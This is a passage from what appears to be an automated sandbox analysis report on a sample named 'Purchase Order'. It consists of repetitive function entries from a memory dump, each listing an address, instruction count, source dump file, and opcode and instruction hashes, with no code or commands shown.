                                                            • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                            • Instruction ID: 742d7a00d6f74a74f9bdaf5699a5dcdcba53a3b4f870090da07bdc5b9f5276f1
                                                            • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                            • Instruction Fuzzy Hash: BBF0FC732047279BD772175D4880BABA69DCFD1B65F190035EE05DB201CBA18F02AAD2
                                                            Function 0189CA6F Relevance: .0, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                            • Instruction ID: aeed75d15b9bb8dcf28230507f183435f1a751b717cdb9419963685f807308e2
                                                            • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                            • Instruction Fuzzy Hash: 1E01F4722006899BD722971DC849F59BFD9EF42754F0C44A9FE04DB6A1D77DCA40C212
                                                            Function 019361E5 Relevance: .0, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b076bffe63d41686178c57b19bbdc529842cd0407dddc16539924747641b07fb
                                                            • Instruction ID: f541539b4d0a9250efba07bcc40c5c0ad247fcba488c9650e189be658450c5dd
                                                            • Opcode Fuzzy Hash: b076bffe63d41686178c57b19bbdc529842cd0407dddc16539924747641b07fb
                                                            • Instruction Fuzzy Hash: B9014F71A01249ABDB04DFA9D445AEEBBF8BF58310F14405AE905F7280D774EB01CBA5
                                                            Function 018E63C0 Relevance: .0, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                            • Instruction ID: 4bac27bb6d25efb3819fc61b818f0fe5e3ea1eb09c13702bc5d4c4139d08ef11
                                                            • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                            • Instruction Fuzzy Hash: 22F0FF7210001DBFEF019F94DD80DAF7BBDEB55398B104125BA1192160D631DE21A7A1
                                                            Function 018EA4B0 Relevance: .0, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2f639e1e1a780c6f42e84717694f0e45ac49239dc2a1f51c4227b10a5df530d2
                                                            • Instruction ID: f64d59e0bfbc6bb539e0c7a67a192fe320514a3779c3bb38925d2cade4fbab60
                                                            • Opcode Fuzzy Hash: 2f639e1e1a780c6f42e84717694f0e45ac49239dc2a1f51c4227b10a5df530d2
                                                            • Instruction Fuzzy Hash: 6F018536110219ABCF129E94D844EDA3FA6FB4CB64F068105FE18A6220C332DA70EB91
                                                            Function 0185C0F0 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 12cfc4a26bb1b2fe26c3e8697f087b0a7bc4d921c00fe985fceb701a4671af01
                                                            • Instruction ID: 0e851132294604f4865ad64e60ea3469b78a8180eac23ec83b8d43e79d3ad076
                                                            • Opcode Fuzzy Hash: 12cfc4a26bb1b2fe26c3e8697f087b0a7bc4d921c00fe985fceb701a4671af01
                                                            • Instruction Fuzzy Hash: 1CF024B23847455BF7A4961D8C01B22329EE7C0791F29806AEF05CB2C1FB70DE018B94
                                                            Function 0189656A Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9b8d15748512a9609ac58a680fcfd12d3f697adc1001a8d2a911d94d353419f2
                                                            • Instruction ID: dadc7ad04767b18bc3f4bc1aef6e5ebd560ee56288f1a326c236b424a6c58ed0
                                                            • Opcode Fuzzy Hash: 9b8d15748512a9609ac58a680fcfd12d3f697adc1001a8d2a911d94d353419f2
                                                            • Instruction Fuzzy Hash: 2801AFB0204785DFFB369B6CCD48F293BE8BB40B04F5C0194BA11DBAD6EB78D6418612
                                                            Function 0190437C Relevance: .0, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                            • Instruction ID: 5a034d6febbb33082e2a5bb292ffa7a196c94f26772b9bdd53c9c5326ecd65a2
                                                            • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                            • Instruction Fuzzy Hash: D4F089353819134BEB77AA2D9A20B2EA75E9F90E52B09252C9759CB6C0DF60D8018791
                                                            Function 018EC89D Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3fb75d9e4ae190666a836cd5393bc3cdaa36ea9aa2cfc6061cf69e082a951eaa
                                                            • Instruction ID: 808f48b97bbeac63213fb9f64ee200eba888f8933f48907c13422cb841ea83cf
                                                            • Opcode Fuzzy Hash: 3fb75d9e4ae190666a836cd5393bc3cdaa36ea9aa2cfc6061cf69e082a951eaa
                                                            • Instruction Fuzzy Hash: F2F0AF716097049FD310EF28C945A1ABBE4FF98710F80465ABC98DB390E734EA00C797
                                                            Function 018EE872 Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                            • Instruction ID: d0d06dd227a6457bcdb1ecbdcb8c25697f90fbc131315c068b8656a867901c4b
                                                            • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                            • Instruction Fuzzy Hash: E7F082337116329BE3319A5ECC84F16B7E8EFD6B60F590165AA08DB264C760ED01D7D1
                                                            Function 01890854 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                            • Instruction ID: 85fe59eb6f5cf158da96034bf3b856023b30145dd2f54c3914523e745d0fab61
                                                            • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                            • Instruction Fuzzy Hash: BAF0B472614204EFE714DB25CC01F56B6EDEF98744F188478A945DB260FAB0DE01C654
                                                            Function 018EC912 Relevance: .0, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ac45a1ba7dcbedf0a5b81d4ee29856d72f0d47a036abe52edb0dfe5b44c3a7b6
                                                            • Instruction ID: 87b7550bc7849bb7931d0f69995e6686d7b4c0897ce5d2445af4838f86b325dd
                                                            • Opcode Fuzzy Hash: ac45a1ba7dcbedf0a5b81d4ee29856d72f0d47a036abe52edb0dfe5b44c3a7b6
                                                            • Instruction Fuzzy Hash: 34F04F70A01249AFDB04EF69C515A5EB7F4EF18300F408055A955EB385DA78EB01CB61
                                                            Function 018647FB Relevance: .0, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7fd35b826b605c8b2ff35bbbca7c89df082d12acab08f417dd6925d225976c20
                                                            • Instruction ID: 9c0ddda46cffb5a72c45fbd614b08842f9befc378f8a63cc33472d3401fde5d8
                                                            • Opcode Fuzzy Hash: 7fd35b826b605c8b2ff35bbbca7c89df082d12acab08f417dd6925d225976c20
                                                            • Instruction Fuzzy Hash: A1F052319023E4CFE733CBECC048B69BBCC9B48B34F08886AC589C7502CB24DA80C650
                                                            Function 01920115 Relevance: .0, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d0f24dbb07334dd826ffdb016c1773dbcd6a72eb72a57ff62caaad8a17c24e71
                                                            • Instruction ID: 6439f90a311de9e9c9b2ad23502e3d155630b948e36504b3f5bfb804f254a280
                                                            • Opcode Fuzzy Hash: d0f24dbb07334dd826ffdb016c1773dbcd6a72eb72a57ff62caaad8a17c24e71
                                                            • Instruction Fuzzy Hash: 73F0277641A79506CB325B2C74602D16F78B782110F6D1485E8A87720FC6748483C320
                                                            Function 0189C5ED Relevance: .0, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4ec2df2eb7b9cbe96050ab370fdcf7cf9b58165d4e77db0193ad2ba3060f29f8
                                                            • Instruction ID: d74f60074ce1528e9f461aba1d071170b829c41c28ff6e18054ad9226dbe2ebe
                                                            • Opcode Fuzzy Hash: 4ec2df2eb7b9cbe96050ab370fdcf7cf9b58165d4e77db0193ad2ba3060f29f8
                                                            • Instruction Fuzzy Hash: 6FF0E2716116519FEF33979CC148B517BD49B807A4F0D942DD506C7552C761FB80CAD1
                                                            Function 018A2619 Relevance: .0, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                            • Instruction ID: c78db8a7db3aa7d4c5d29eb7829f1c1ec36f21a2858d0fdd0d86c96324e48079
                                                            • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                            • Instruction Fuzzy Hash: 31E092323416012BE7219E5D8C80F47776E9F92B10F440479B6049E251C9E2DE0982A5
                                                            Function 018F6030 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                            • Instruction ID: ed9753b370396955b0149883881204bc11cdd70556354f09abc4c76523160ae8
                                                            • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                            • Instruction Fuzzy Hash: 45F0A0721002049FE3208F09D840F52B7F8EB55368F25C129E708EB160E33AED40CBA0
                                                            Function 01860710 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                            • Instruction ID: ffccefc2245c9dcc5daa57726e773614f65464473e93a2f0de1331140f6123fb
                                                            • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                            • Instruction Fuzzy Hash: 0EF0E5392043459FDB1ACF19D050AD57BA8FB41360F004094FC46CB301D736EB81CB95
                                                            Function 018949D0 Relevance: .0, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                            • Instruction ID: 5153e7afc93dcc967da5abdeef100ea61246689e38cc1ab69750209788614ecc
                                                            • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                            • Instruction Fuzzy Hash: 70E0D833244149AFDB211A5D8900B6677E5DBD27A0F1D0429E202DB151DB78DE42C7D8
                                                            Function 0190678E Relevance: .0, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                            • Instruction ID: 7fd675733be6f0e4d2f153336ad4905eecc2ee46fca47eb0debe12877969e712
                                                            • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                            • Instruction Fuzzy Hash: 50E0DF32A00214BFDB2297998E01F9ABEBCDB90FA0F090058B604E70D0E630DF00C690
                                                            Function 019308C0 Relevance: .0, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                            • Instruction ID: 207262e27608a928cb306de5622a67b12e58dd726148b3c099459f287395febe
                                                            • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                            • Instruction Fuzzy Hash: 33E09B316403508BCB258E1DD140A53B7ECDFD5661F198479E90D47612C232F852C6D1
                                                            Function 018625E0 Relevance: .0, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 03738cb30e3e20bf3991c04ed20b721ac9cf9fcaac3cd002590760b694906e02
                                                            • Instruction ID: 3225f4b18801f48265648a0d506b2a4a82691740a69dc3fd3147f91173081a9e
                                                            • Opcode Fuzzy Hash: 03738cb30e3e20bf3991c04ed20b721ac9cf9fcaac3cd002590760b694906e02
                                                            • Instruction Fuzzy Hash: 88E092321006549BC321BB2DDD01F8A779AEBA0364F014515B115971A0CA30AE10C795
                                                            Function 0191A456 Relevance: .0, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                            • Instruction ID: e81c3a24030f68cf81371ceece07b1f7b3ca9dd0f84db3bd52dc55015acb0704
                                                            • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                            • Instruction Fuzzy Hash: 3BE09231051651DFE7326F2EC848B52BAE5BF50B12F148C2CA19E424F0C7759DC1DA41
                                                            Function 018E4000 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                            • Instruction ID: 4a76d3d78dc925c233afe1c9e4f202c0df19ab5c19b63cf59249f3906d839e67
                                                            • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                            • Instruction Fuzzy Hash: 16E0AE343002058BE755CF1AC044B627BA6BFD6B10F28C078A9488F205EB32A9428A40
                                                            Function 0189CA38 Relevance: .0, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3de513aadebbcc39811d50ec301e15a5d34075da58c82198b6631182de3f4e1a
                                                            • Instruction ID: 8d12239636aa18c6e7b97c3e351986b6126d776ae3efaa48241502279db39c57
                                                            • Opcode Fuzzy Hash: 3de513aadebbcc39811d50ec301e15a5d34075da58c82198b6631182de3f4e1a
                                                            • Instruction Fuzzy Hash: EFD02B724850606ACF36F11C7C04F973ADAAB50770F094C60F108D2010D759CE8193C4
                                                            Function 0185823B Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                            • Instruction ID: 0c384ce3766c7e3ed7ead31bea841abd72a6733b4cb037b3a9695677baa7392a
                                                            • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                            • Instruction Fuzzy Hash: 2EE08C31104A14EFEB322E2BDC00B517BA2FF95B90F10482AE482864A48670AA82DA46
                                                            Function 01862050 Relevance: .0, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4ac4f2e4de0ee9cbba0d351c0d51b48cfbde077107ce294824e84243d5a3d9f1
                                                            • Instruction ID: b729edb7e3eb86a83ea39dca488b180e7604203ceec5a1a56f0f8d559b2cc663
                                                            • Opcode Fuzzy Hash: 4ac4f2e4de0ee9cbba0d351c0d51b48cfbde077107ce294824e84243d5a3d9f1
                                                            • Instruction Fuzzy Hash: 03E0C2331015506BC311FB6DDD41F4A739EEFA4360F000221F151D72E0CA20EE00C796
                                                            Function 01898A90 Relevance: .0, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                            • Instruction ID: 2f85b015491076f397f015e2976138c339f390a9b9ffc277d9e8edb78631f64e
                                                            • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                            • Instruction Fuzzy Hash: 23E08633111A188BC728DE18D512B7277E4EF46720F09463EA61387780C534E544C795
                                                            Function 018B6AA4 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                            • Instruction ID: 19d3ed3a5fe45c8cd3d52b6843063e2a4e136be0df45fa7ab45a04d7ccfa86ef
                                                            • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                            • Instruction Fuzzy Hash: 59D05E36511A50AFD7329F1BEE40C53BBF9FBC4B10705062EA54583A20C670E906DBA1
                                                            Function 0189E59C Relevance: .0, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                            • Instruction ID: cd511628931613b0d14ca2a3ba076f8ac2785bfa2ab5cee2f3280edec34b3b66
                                                            • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                            • Instruction Fuzzy Hash: 67D02233604620AFE732AA2CFC00FC333E8BB98720F060459F018C7050C360EC81DA84
                                                            Function 018DE908 Relevance: .0, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                            • Instruction ID: 158bbe4ca53f8e868881e579790dfbfa263ae371051a1971e441fd1d3d765038
                                                            • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                            • Instruction Fuzzy Hash: 14E0EC35951784AFDF12DF6DC640F5EBBB9BB94B40F550054A5089F660C624EA00DB81
                                                            Function 0185A0E3 Relevance: .0, Instructions: 15COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                            • Instruction ID: 2db5ac1c2f2dd1c6d1c3381130e86fa8cd54d163d8b68635adc7d5b7b1d90626
                                                            • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                            • Instruction Fuzzy Hash: B5D0223222203093DB2C56696880F637905FBC0B94F0A012C3C0AD3800C0048D43E2E1
                                                            Function 0189A830 Relevance: .0, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                            • Instruction ID: 813e57a6811fb33eac8cf7934c5051011562cda9ca06aaf5d65c7298ed711717
